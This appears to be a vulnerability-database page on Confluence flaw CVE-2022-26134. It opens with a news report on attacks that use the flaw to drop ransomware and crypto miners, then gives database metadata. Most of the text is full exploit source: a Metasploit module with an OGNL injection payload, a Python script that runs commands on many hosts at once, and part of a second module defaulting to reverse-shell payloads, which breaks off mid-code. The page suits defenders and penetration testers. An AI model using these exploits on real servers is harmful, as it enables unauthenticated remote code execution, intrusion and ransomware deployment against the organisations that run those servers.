DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:0488E447E08622B0366A0332F848212D", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Atlassian Confluence Flaw Being Used to Deploy Ransomware and Crypto Miners", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj9rIpLd7Wt8S6XBYbfSyi_LxY3hVen8bxDxWgv56ywl84WByL1Zl26yIu_oQ18uh4gvIi8vulmy9q1SZTMxCmqhEiWx0sm82_GHXfs821huyPVdY3i9HR5j_Dk6uxz27udcCKd-Tl7Z1edq42KHthx8Ln0XuGeTqNQ5nDnXn7z5jvyBqljfIiqhIVu/s728-e100/ransomware.jpg>)\n\nA recently patched [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.\n\nIn at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a [crypto miner](<https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/>) called z0miner on victim networks.\n\nThe bug ([CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>), CVSS score: 9.8), which was [patched](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) by Atlassian on June 3, 2022, enables an unauthenticated actor to inject malicious code that paves the way of remote code execution (RCE) on affected installations of the collaboration suite. All supported versions of Confluence Server and Data Center are affected.\n\nOther notable malware pushed as part of disparate instances of attack activity include Mirai and Kinsing bot variants, a rogue package called [pwnkit](<https://thehackernews.com/2022/01/12-year-old-polkit-flaw-lets.html>), and Cobalt Strike by way of a web shell deployed after gaining an initial foothold into the compromised system.\n\n\"The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server's local storage,\" Andrew Brandt, principal security researcher at Sophos, [said](<https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/>).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj4ylTTjRkYLtYQCSXoVz8gUgRgTa98lR7XaqcG9UbybTcDEi9J5hfotnq_Gutzoj81P5XHccmBjiW9E7KZlw5edBNyVl0N0zwIwuyQGM4A95z1ZdyCtPLIHlvFzE_XXxyZJjC55Sp3sPQrsczwhlKexPSQGqBrt0qHXhWsFMoMEcBZXvs-OTYPTLet/s728-e100/code.jpg>)\n\nThe disclosure overlaps with similar warnings from Microsoft, which [revealed](<https://twitter.com/MsftSecIntel/status/1535417776290111489>) last week that \"multiple adversaries and nation-state actors, including [DEV-0401](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0401>) and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134.\"\n\nDEV-0401, described by Microsoft as a \"China-based lone wolf turned LockBit 2.0 affiliate,\" has also been previously linked to ransomware deployments targeting internet-facing systems running VMWare Horizon ([Log4Shell](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>)), Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>)), and on-premises Exchange servers ([ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>)).\n\nThe development is emblematic of an [ongoing trend](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) where threat actors are increasingly capitalizing on newly disclosed critical vulnerabilities rather than exploiting publicly known, dated software flaws across a broad spectrum of targets.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2022-06-18T04:11:00", "modified": "2022-06-18T04:11:14", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "immutableFields": [], "lastseen": "2022-06-18T05:57:47", "viewCount": 25, "enchantments": {"score": {"value": 1.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:4A411E7E1CF65A8662ABD43534726FEF", "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:99D943E3269E3EABFC3348509D099BA8", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940", "CONFSERVER-68844", "CONFSERVER-79000", "CONFSERVER-79016"]}, {"type": "attackerkb", "idList": ["AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D"]}, {"type": "avleonov", "idList": ["AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:E820C062BC9959711E1D1152D8848072"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0548", "CPAI-2022-0297"]}, {"type": "cisa", "idList": ["CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "CISA:71FB648030101FA9B007125DFA636193", "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "CISA:D7188D434879621A3A83E708590EAE42"]}, {"type": "cve", "idList": ["CVE-2021-26084", "CVE-2022-26134"]}, {"type": "exploitdb", "idList": ["EDB-ID:50243", "EDB-ID:50952"]}, {"type": "githubexploit", "idList": ["00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "02241D2D-F86F-5FE5-95FD-6978A07FE7FA", "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "09477170-A03D-5C2D-AC41-0D0A8F51EDB3", "0989C9B1-62A8-505A-B12F-586D7FAADEEE", "0E5BE237-A243-54B8-9AD7-92FBA10D1FA2", "12691014-3333-5741-80A4-3357BD72D2AC", "18A205C9-C2EE-55CC-9BFD-4054390F94E9", "1A808CE9-B43C-50A7-A06E-75B3C5A7D5AC", "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "1F9C946C-1533-5835-B5E8-641EF4FFC145", "20BFC1D4-CB1E-51CF-82D8-E4258142BB69", "2444574D-533F-593F-8E0E-68EA2B47EF55", "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "26F41B84-2AAF-5C6C-BE06-461FF65C6D03", "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "28E888C4-78E3-5F8D-B316-AB42FED892F9", "2A83DE3B-242D-51BE-84C8-5EB39AE1800E", "2B2A8A69-A893-5E85-8B02-6D8A77B54853", "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "2D36D631-FAE1-5508-9C60-F4B807EC6C47", "305ADB34-3669-5AAD-8D51-FCFFEF9E3F47", "34793974-B475-5BC4-BAAA-64FE57D0B3D9", "35830627-EBEC-59C8-A142-2F06CCF8EA5B", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "3CD4239D-A6D3-5B3A-A18E-D5B99C51B5E5", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "3F29DC5F-237B-53EB-B173-8F4751FE66A7", "423DF4D5-60AF-5663-B196-2A67DD13D226", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "4D37AF88-23E8-5A3B-B559-7807CB07DB09", "5255E938-0B92-5E2C-B1A4-21B2445C29AF", "53CC55D8-983C-5FA9-AE81-D20750A6612E", "54DD3775-9F3C-54DF-93EF-372304E8EE4B", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "65AEB692-CDF9-53FB-B13F-CAB5A4288606", "66468422-89C0-5AC8-9CEA-6B512338FF7C", "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "796BB1A4-EF64-57CA-862E-996A72F2FBE5", "7BE60530-0495-5366-846A-73B1A778DBDA", "83B145E2-F995-5B1C-863E-164839ED1173", "84D5F04A-0DDB-5788-8759-DA99D303B756", "8F6AEAF4-2161-55F7-96CB-003251BDC309", "94DD467E-7BFF-5F8A-810C-3B1BDD195F6A", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A9A21055-01FA-5B3E-84B3-E294A9641418", "AB8EAC0D-269A-5799-885F-B0EA2A33792C", "B16D26DB-D60C-5C0C-9452-80112720B442", "B47171B0-339A-582E-8AAC-3B18373664B7", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "BAEE7CC9-E997-5B82-A169-AB56B635CC1D", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "C6912636-2CB2-54CA-9F78-1A4FF04CA119", "C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60", "C9B0311C-F06D-5438-B36E-36DCE5FE691D", "CD8CABD7-BE65-5434-B682-F73ABA737C65", "CE477D7E-7586-5C82-8DCC-033C48461E66", "D22CFFB0-30A6-5227-8048-C9C028070BD3", "DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6", "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB", "EF37F62F-1579-535A-9C3E-49B080F41CAC", "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "F42BF447-C1A3-5795-8343-D71F096AFF52", "F8CD1EFD-78D9-5506-9555-5A12EFB752AB", "FD4859A0-D69F-503C-BFDB-0C9025BDC68F"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA"]}, {"type": "hivepro", "idList": ["HIVEPRO:E9C63D0D70D3232F21940B33FC205340"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0BD55CF3ADC4FC18663ADAF4AE9272D2", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:F193BFA34E9266EE9047B9FAB1A3A1B5"]}, {"type": "kitploit", "idList": ["KITPLOIT:3043339745958474082"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4E1B9086679032E60157678F3E82229D", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_NAMESPACE_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433"]}, {"type": "nessus", "idList": ["CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE-2022-26134_REMOTE.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "CONFLUENCE_CVE_2022_26134.NBIN", "WEB_APPLICATION_SCANNING_112944", "WEB_APPLICATION_SCANNING_112961", "WEB_APPLICATION_SCANNING_112962", "WEB_APPLICATION_SCANNING_112963", "WEB_APPLICATION_SCANNING_112964", "WEB_APPLICATION_SCANNING_113248"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:167430", "PACKETSTORM:167449"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D"]}, {"type": "securelist", "idList": ["SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "thn", "idList": ["THN:080602C4CECD29DACCA496697978CAD0", "THN:1E1F3CC9BEE728A9F18B223FC131E9B1", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:362401076AC227D49D729838DBDC2052", "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "THN:4DE731C9D113C3993C96A773C079023F", "THN:573D61ED9CCFF01AECC281F8913E42F8", "THN:5763EE4C0049A18C83419B000AAB347A", "THN:81C9EF28EEDF49E21E8DF15A8FF7EB8D", "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "THN:F0450E1253FFE5CA527F039D3B3A72BD", "THN:F076354512CA34C263F222F3D62FCB1E"]}, {"type": "threatpost", "idList": ["THREATPOST:042D7C606FEB056B462B0BFB61E59917", "THREATPOST:22B3A2B9FF46B2AE65C74DA2E505A47E", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:8C179A769DB315AF46676A862FC3D942"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2022-26134"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:E69ED97E0B27F68EA2CE3BB7BA9FE681"]}, {"type": "zdt", "idList": ["1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37778", "1337DAY-ID-37781", "1337DAY-ID-37783"]}]}, "vulnersScore": 1.2}, "_state": {"score": 1659990670, "dependencies": 1659988328}, "_internal": {"score_hash": "a08459ccda3fe391b5afdedf1a1fa342"}}

{"packetstorm": [{"lastseen": "2022-06-08T16:37:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-08T00:00:00", "id": "PACKETSTORM:167449", "href": "https://packetstormsecurity.com/files/167449/Atlassian-Confluence-Namespace-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Confluence Namespace OGNL Injection', \n'Description' => %q{ \nThis module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to \nevaluate an OGNL expression resulting in OS command execution. \n}, \n'Author' => [ \n'Unknown', # exploited in the wild \n'bturner-r7', \n'jbaines-r7', \n'Spencer McIntyre' \n], \n'References' => [ \n['CVE', '2021-26084'], \n['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'], \n['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'], \n['URL', 'https://github.com/jbaines-r7/through_the_wire'], \n['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis'] \n], \n'DisclosureDate' => '2022-06-02', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8090 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nversion = get_confluence_version \nreturn CheckCode::Unknown unless version \n \nvprint_status(\"Detected Confluence version: #{version}\") \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl('', header: header) # empty command works for testing, the header will be set \n \nreturn CheckCode::Unknown unless res \n \nunless res && res.headers.include?(header) \nreturn CheckCode::Safe('Failed to test OGNL injection.') \nend \n \nCheckCode::Vulnerable('Successfully tested OGNL injection.') \nend \n \ndef get_confluence_version \nreturn @confluence_version if @confluence_version \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'login.action') \n) \nreturn nil unless res&.code == 200 \n \npoweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text \nreturn nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/ \n \n@confluence_version = Rex::Version.new(Regexp.last_match(1)) \n@confluence_version \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl(cmd, header: header) \n \nunless res && res.headers.include?(header) \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good(\"Successfully executed command: #{cmd}\") \nres.headers[header] \nend \n \ndef inject_ognl(cmd, header:) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'), \n'headers' => { header => cmd } \n) \nend \n \ndef ognl_payload(_cmd, header:) \n<<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '') \n${ \nClass.forName(\"com.opensymphony.webwork.ServletActionContext\") \n.getMethod(\"getResponse\",null) \n.invoke(null,null) \n.setHeader(\"#{header}\", \nClass.forName(\"javax.script.ScriptEngineManager\") \n.newInstance() \n.getEngineByName(\"js\") \n.eval(\"java.lang.Runtime.getRuntime().exec([ \n#{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"}, \ncom.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}') \n]); '#{Faker::Internet.uuid}'\") \n) \n} \nOGNL \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167449/atlassian_confluence_namespace_ognl_injection.rb.txt"}, {"lastseen": "2022-06-07T16:53:40", "description": "", "cvss3": {}, "published": "2022-06-07T00:00:00", "type": "packetstorm", "title": "Confluence OGNL Injection Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "PACKETSTORM:167430", "href": "https://packetstormsecurity.com/files/167430/Confluence-OGNL-Injection-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python3 \n \n# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection \n# Google Dork: N/A \n# Date: 06/006/2022 \n# Exploit Author: h3v0x \n# Vendor Homepage: https://www.atlassian.com/ \n# Software Link: https://www.atlassian.com/software/confluence/download-archives \n# Version: All < 7.4.17 versions before 7.18.1 \n# Tested on: - \n# CVE : CVE-2022-26134 \n# https://github.com/h3v0x/CVE-2022-26134 \n \nimport sys \nimport requests \nimport optparse \nimport multiprocessing \n \nfrom requests.packages import urllib3 \nfrom requests.exceptions import MissingSchema, InvalidURL \nurllib3.disable_warnings() \n \nrequestEngine = multiprocessing.Manager() \nsession = requests.Session() \n \nglobal paramResults \nparamResults = requestEngine.list() \nglobals().update(locals()) \n \ndef spiderXpl(url): \nglobals().update(locals()) \nif not url.startswith('http'): \nurl='http://'+url \n \nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\", \n\"Connection\": \"close\", \n\"Accept-Encoding\": \"gzip, deflate\"} \n \ntry: \nresponse = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False) \nif(response.status_code == 302): \nprint('Found: '+url+' // '+ response.headers['X-Cmd-Response']) \n \ninputBuffer = str(response.headers['X-Cmd-Response']) \nparamResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n') \nelse: \npass \n \nexcept requests.exceptions.ConnectionError: \nprint('[x] Failed to Connect: '+url) \npass \nexcept multiprocessing.log_to_stderr: \npass \nexcept KeyboardInterrupt: \nprint('[!] Stoping exploit...') \nexit(0) \nexcept (MissingSchema, InvalidURL): \npass \n \n \ndef banner(): \nprint('[-] CVE-2022-26134') \nprint('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n') \n \n \ndef main(): \nbanner() \n \nglobals().update(locals()) \n \nsys.setrecursionlimit(100000) \n \nif not optionsOpt.filehosts: \nurl = optionsOpt.url \nspiderXpl(url) \nelse: \nf = open(optionsOpt.filehosts) \nurls = map(str.strip, f.readlines()) \n \nmultiReq = multiprocessing.Pool(optionsOpt.threads_set) \ntry: \nmultiReq.map(spiderXpl, urls) \nmultiReq.close() \nmultiReq.join() \nexcept UnboundLocalError: \npass \nexcept KeyboardInterrupt: \nexit(0) \n \n \nif optionsOpt.output: \nprint(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output) \n \nwith open(optionsOpt.output, \"w\") as f: \nfor result in paramResults: \nf.write(\"%s\\n\" % result) \nf.close() \n \nif __name__ == \"__main__\": \nparser = optparse.OptionParser() \n \nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)') \nparser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt') \nparser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10) \nparser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8) \nparser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt') \nparser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id') \noptionsOpt, args = parser.parse_args() \n \nmain() \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167430/CVE-2022-26134.py.txt"}, {"lastseen": "2021-09-10T05:12:51", "description": "", "cvss3": {}, "published": "2021-09-10T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence WebWork OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-10T00:00:00", "id": "PACKETSTORM:164122", "href": "https://packetstormsecurity.com/files/164122/Atlassian-Confluence-WebWork-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Confluence WebWork OGNL Injection', \n'Description' => %q{ \nThis module exploits an OGNL injection in Atlassian Confluence's \nWebWork component to execute commands as the Tomcat user. \n}, \n'Author' => [ \n'Benny Jacob', # Discovery \n'Jang', # Analysis \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-26084'], \n['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'], \n['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'], \n['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'], \n['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'], \n['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'], \n['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6'] \n], \n'DisclosureDate' => '2021-08-25', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], # TODO: Windows? \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, # Tomcat user \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8090 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \n# /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log \n# /var/atlassian/application-data/confluence/logs/atlassian-confluence.log \nIOC_IN_LOGS, \nARTIFACTS_ON_DISK # CmdStager \n] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \ntoken1 = rand_text_alphanumeric(8..16) \ntoken2 = rand_text_alphanumeric(8..16) \ntoken3 = rand_text_alphanumeric(8..16) \n \nres = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\") \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\") \nreturn 